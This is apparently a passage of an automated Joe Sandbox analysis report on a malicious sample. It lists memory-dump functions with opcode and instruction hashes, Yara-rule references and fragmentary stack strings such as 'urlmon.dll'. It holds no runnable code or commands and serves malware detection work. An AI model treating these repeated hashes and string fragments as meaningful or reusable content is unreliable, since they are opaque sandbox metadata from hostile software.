                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6d060f1005729feea904046387f6a739fb91b49ed5a57b99a4ea2b11cf873dc4
                                                                                                                                                                                                                                                • Instruction ID: aecd6df25688ccbb574f007428670cea0a41ee8962e90472dca83699ecec8590
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d060f1005729feea904046387f6a739fb91b49ed5a57b99a4ea2b11cf873dc4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67E0863A60136437D2245589AC49F57B76CCFC5EA4F050565FF089B344E760F92142E5
                                                                                                                                                                                                                                                Function 041A8F6A Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction ID: c8674ce149c7a4104634ab6e5bad18ac2c91cbbbf8274e506413ac005cbbeffa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8E04636200204BBE220EA99EC40F9B77ADEFC5660F00801AFA49A7240CB70B91287F0
                                                                                                                                                                                                                                                Function 0418AB50 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 066730849e8095a0913c255ebdd870debf11e864cce086af66d8eebec6b96c21
                                                                                                                                                                                                                                                • Instruction ID: 7cd8ad2b441719b29b4d9829af131d7e66589d9d894961bcab0080f924e75153
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066730849e8095a0913c255ebdd870debf11e864cce086af66d8eebec6b96c21
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A99002A9501081A3192231611BC4C171D1699D76A41910559A8465C146578054609416

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 04193ABD Relevance: 51.4, Strings: 41, Instructions: 172COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3248090998
                                                                                                                                                                                                                                                • Opcode ID: 8d70e5d70c182c8d919e19dd3a52654b565bb5327018ed8ff7685fc0ad95d715
                                                                                                                                                                                                                                                • Instruction ID: d360f2e6ab9a7b9a1de296cfea300d70a283643a1cba691b6f54b4acb8fec1b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d70e5d70c182c8d919e19dd3a52654b565bb5327018ed8ff7685fc0ad95d715
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10910FF09052A98ECB118F55A5603DFBF71BB85204F1581E9C6AA7B203C3BE5E85DF90
                                                                                                                                                                                                                                                Function 04193ACA Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3248090998
                                                                                                                                                                                                                                                • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                                                                                                                                                • Instruction ID: 86790d2ff271a1a8ec730bee7772742a7845897853776405978394eda41436ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F19100F09052A98ACB118F55A5603DFBF71BB85204F1581E9C6AA7B243C3BE4E45DF90
                                                                                                                                                                                                                                                Function 041A25BA Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                                                                                                                • API String ID: 0-1002149817
                                                                                                                                                                                                                                                • Opcode ID: 3f07374bf50e5ec1df2e4cc52326f957e9b81f48414e65e5b5f9d20291bcc9e3
                                                                                                                                                                                                                                                • Instruction ID: d7d00849ca90a31ffbc2786aa04224341d3785a88c46002e8a647e4deecce725
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f07374bf50e5ec1df2e4cc52326f957e9b81f48414e65e5b5f9d20291bcc9e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AC12FB1D053689AEB60DFA4CD94BEEBBB9AF05304F0081D9D50CB7241E7B55A88CF91
                                                                                                                                                                                                                                                Function 0418A347 Relevance: 33.9, Strings: 27, Instructions: 116COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !$"$%$%C$&$)7$*u$.$1$2$6$8$D$Fe$H$IZ$J$L$RH$`$aY$b$f$lt$t$y$}
                                                                                                                                                                                                                                                • API String ID: 0-2512209176
                                                                                                                                                                                                                                                • Opcode ID: ba1f339fb7814ace23cefa46244598c41f474e99670de9a50e7025451fe769c9
                                                                                                                                                                                                                                                • Instruction ID: 6795ee97d35b550cf772a7ed6d8508696be3dc8cfa6da505a6ba44847e54df01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba1f339fb7814ace23cefa46244598c41f474e99670de9a50e7025451fe769c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB8128B0C05269CBEB60CF81C9987DEBBB1BB05308F5085D9C5583B381D7BA1A89CF95
                                                                                                                                                                                                                                                Function 0418A304 Relevance: 30.1, Strings: 24, Instructions: 120COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: "$%$%C$&$)7$*u$.$1$2$6$8$D$Fe$IZ$J$L$RH$`$aY$f$lt$t$y$}
                                                                                                                                                                                                                                                • API String ID: 0-2158927153
                                                                                                                                                                                                                                                • Opcode ID: c5e648fda84193f8728477c0c5e69d2414775f04fd5d7e481972c85c19d3c8fa
                                                                                                                                                                                                                                                • Instruction ID: a4eeed29e1142d7f807241b134a69c98cc3795ad8164c97599c6390fa4eabb70
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5e648fda84193f8728477c0c5e69d2414775f04fd5d7e481972c85c19d3c8fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC8159B0C05269CFEB64CF91C9987DEBBB1BB05308F6085D9C5483B281D7BA1A89CF55
                                                                                                                                                                                                                                                Function 0419F43A Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                                                                                                                                • API String ID: 0-3236418099
                                                                                                                                                                                                                                                • Opcode ID: 467fdb026db4e19bfd3ed9c1ed5c01cb504cbb3b6ab38a5278fff1488a373991
                                                                                                                                                                                                                                                • Instruction ID: 1e32191fd1347f0bd4659ee700a2b665eecefa8220cbfcbf847ddc33e523a9cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 467fdb026db4e19bfd3ed9c1ed5c01cb504cbb3b6ab38a5278fff1488a373991
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B39141B1900258AAEB24DFA4DC81FEEB7B9FF44708F004599E608A6140EB756F95CF61
                                                                                                                                                                                                                                                Function 0419ABCA Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                                                • API String ID: 0-392141074
                                                                                                                                                                                                                                                • Opcode ID: 510fbb027797b0bfb01bdbf301a91546d78afd3a076f9ad19c496b3a84fca1e8
                                                                                                                                                                                                                                                • Instruction ID: 1201be5eff6efb193e73b78d270bbb81dcb5fc7a7e83735a0abc87d832c5d811
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510fbb027797b0bfb01bdbf301a91546d78afd3a076f9ad19c496b3a84fca1e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D7151B1C00258ABEB15DF94CD80FEEB77DAF48709F004599E619A7150EB746B888FA1
                                                                                                                                                                                                                                                Function 0419ABBE Relevance: 16.4, Strings: 13, Instructions: 182COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                                                • API String ID: 0-392141074
                                                                                                                                                                                                                                                • Opcode ID: 3a8d94db562064f08b32efb1d0c0cd6866751a42f9343a2fd8f45d34947baadd
                                                                                                                                                                                                                                                • Instruction ID: e3a462e7364bc9095fdc2f92e2c7ef0f05b28772f62cab9bdaad569bcebcd646
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a8d94db562064f08b32efb1d0c0cd6866751a42f9343a2fd8f45d34947baadd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F96152B1C00658ABEB15DF90CD80FEEB779AF44709F00459DE619A6150EB746B8C8F61
                                                                                                                                                                                                                                                Function 0418E8B1 Relevance: 13.9, Strings: 11, Instructions: 124COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                                                                                • API String ID: 0-685823316
                                                                                                                                                                                                                                                • Opcode ID: 89fa26514bead3f7b87e5b2ba4dc1bcd3a11a9c3a7769c96b5072b9eb7d7dd40
                                                                                                                                                                                                                                                • Instruction ID: a9541b198b87780d248ebcec6f40b29c1dfbdadb16788ce695fedc041dfaff18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89fa26514bead3f7b87e5b2ba4dc1bcd3a11a9c3a7769c96b5072b9eb7d7dd40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E418EB1D01358AEEB00DF94CC85BEEBBB9FF45704F04415EE614AA180DBB56608CBA4
                                                                                                                                                                                                                                                Function 0418E8BA Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                                                                                • API String ID: 0-685823316
                                                                                                                                                                                                                                                • Opcode ID: 018874510d1ad61af64e0c290d2086b2e7bf9453b6ce42f2c40ab5d0bc39ed63
                                                                                                                                                                                                                                                • Instruction ID: c84bbf85268996175cfcea922f23f45782ee6225278d99e0474a3f66e8c67a64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 018874510d1ad61af64e0c290d2086b2e7bf9453b6ce42f2c40ab5d0bc39ed63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2173B5D51218AAEF50DFD0CC85BEEB7B9BF04704F00815CE618B6180DBB526488FA5
                                                                                                                                                                                                                                                Function 0419F8FA Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                                                                                                                                • API String ID: 0-2304485323
                                                                                                                                                                                                                                                • Opcode ID: 35eb6e50b97272b05f15557d9cc052ea7e7ab099bedaded62e8f3f10762339d9
                                                                                                                                                                                                                                                • Instruction ID: 0d251e67237a0f78be288ef82a8b4e5876c91c8409b175b44210a0a125eaf9de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35eb6e50b97272b05f15557d9cc052ea7e7ab099bedaded62e8f3f10762339d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91D10BB6900249ABEB14DFA4CC91FEEB7F9FF48308F448919E609D6140E778B915CB61
                                                                                                                                                                                                                                                Function 04195CE5 Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .$P$e$i$m$o$r$x
                                                                                                                                                                                                                                                • API String ID: 0-620024284
                                                                                                                                                                                                                                                • Opcode ID: 30563b5e573bf3f766de42d0014de75b6fc1f7ac922d1ca7b1848ea429a7cc1e
                                                                                                                                                                                                                                                • Instruction ID: 1f7274f73b5c3af65088429c59ac41c14edb2d30c379781d9a9b308db3000a4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30563b5e573bf3f766de42d0014de75b6fc1f7ac922d1ca7b1848ea429a7cc1e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E941A9B680425876EB14EFA0CC80FEE737DAF55304F00859DAA0D67141EBB57B988FA1
                                                                                                                                                                                                                                                Function 04195CEA Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .$P$e$i$m$o$r$x
                                                                                                                                                                                                                                                • API String ID: 0-620024284
                                                                                                                                                                                                                                                • Opcode ID: 15a742aebe3b8eb08cab01e5e629f41d93c8fd969317f24dd7b3f7adcdb940b4
                                                                                                                                                                                                                                                • Instruction ID: 5ea1378395166815ffea4c8012ca6c5937d2d518d5059840ce8ebbd963b875c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a742aebe3b8eb08cab01e5e629f41d93c8fd969317f24dd7b3f7adcdb940b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1419BB680425876EB14EBA0CD80FEE737CAF55304F00859DAA0D67141EBB57B988FA1
                                                                                                                                                                                                                                                Function 041A2E1A Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: L$S$\$a$c$e$l
                                                                                                                                                                                                                                                • API String ID: 0-3322591375
                                                                                                                                                                                                                                                • Opcode ID: 0ff3d4041bedef0ea40497477e260d131b3690a3a9380380ee4912165d91b004
                                                                                                                                                                                                                                                • Instruction ID: 67714f5fd1e489fe9df674b47700d5697b90968ea272db6e081348f7b20c2555
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff3d4041bedef0ea40497477e260d131b3690a3a9380380ee4912165d91b004
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E641C776C04258AEDB10DFA4CCC4FEEB7F9EF88304F00819AE909A7200E77169958F94
                                                                                                                                                                                                                                                Function 041872FA Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #$;$D$J$S$T$V
                                                                                                                                                                                                                                                • API String ID: 0-2646123269
                                                                                                                                                                                                                                                • Opcode ID: 88a82d70e3e9cb6557f842f984d1a55dcbf1b5eafdbbe36b11b521e94e770730
                                                                                                                                                                                                                                                • Instruction ID: 19d6e5c60215c000313532d7a9e765ed011b803ddd3ca520350b6d9335137677
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88a82d70e3e9cb6557f842f984d1a55dcbf1b5eafdbbe36b11b521e94e770730
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111FF10D087CAD9DB12C7BC88446AEBF715F13224F0883D9D8B52A2D2C2795306CBA6
                                                                                                                                                                                                                                                Function 0419A98A Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: F$P$T$f$r$x
                                                                                                                                                                                                                                                • API String ID: 0-2523166886
                                                                                                                                                                                                                                                • Opcode ID: dc950b9fc154a476d94b167f5b4608ba225eced29f1dbf840292fb7d8ee7441b
                                                                                                                                                                                                                                                • Instruction ID: b9018aea4c6fca0a69b3f1a78c3902d6809fc9f8887b37f35b47bb6cc0c2de69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc950b9fc154a476d94b167f5b4608ba225eced29f1dbf840292fb7d8ee7441b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0519371900344AEEB34DF65CDC4BEAB7F8EF04744F004699E61A56180E7B4BA59CBA2
                                                                                                                                                                                                                                                Function 0419A97C Relevance: 7.5, Strings: 6, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: F$P$T$f$r$x
                                                                                                                                                                                                                                                • API String ID: 0-2523166886
                                                                                                                                                                                                                                                • Opcode ID: 384509e77478aa4b3b8d4fa3282fd72ed6d41625f9cbeb251b91ed920d458212
                                                                                                                                                                                                                                                • Instruction ID: 5b642e125f74bd74b0515bdd4a9245cd89b672b9ca4a95ae302d358289364f7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 384509e77478aa4b3b8d4fa3282fd72ed6d41625f9cbeb251b91ed920d458212
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01B1B1C00218ABEB10DF94C9486EEBB75FF01354F008299D8146B200E3B5964ACBD1
                                                                                                                                                                                                                                                Function 0419A09A Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $i$l$o$u
                                                                                                                                                                                                                                                • API String ID: 0-2051669658
                                                                                                                                                                                                                                                • Opcode ID: f7572caac289394f358125bf538b03e969190432902613bbc75fe7b01de9ae0e
                                                                                                                                                                                                                                                • Instruction ID: 0f331598f127c144f9155d5e6585737b17930380916a070e78254c5298694823
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7572caac289394f358125bf538b03e969190432902613bbc75fe7b01de9ae0e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05612FB1A00744AFDB24DFA4CC84FEFB7F9AF48710F104559E51697240E775BA458BA0
                                                                                                                                                                                                                                                Function 0419A096 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
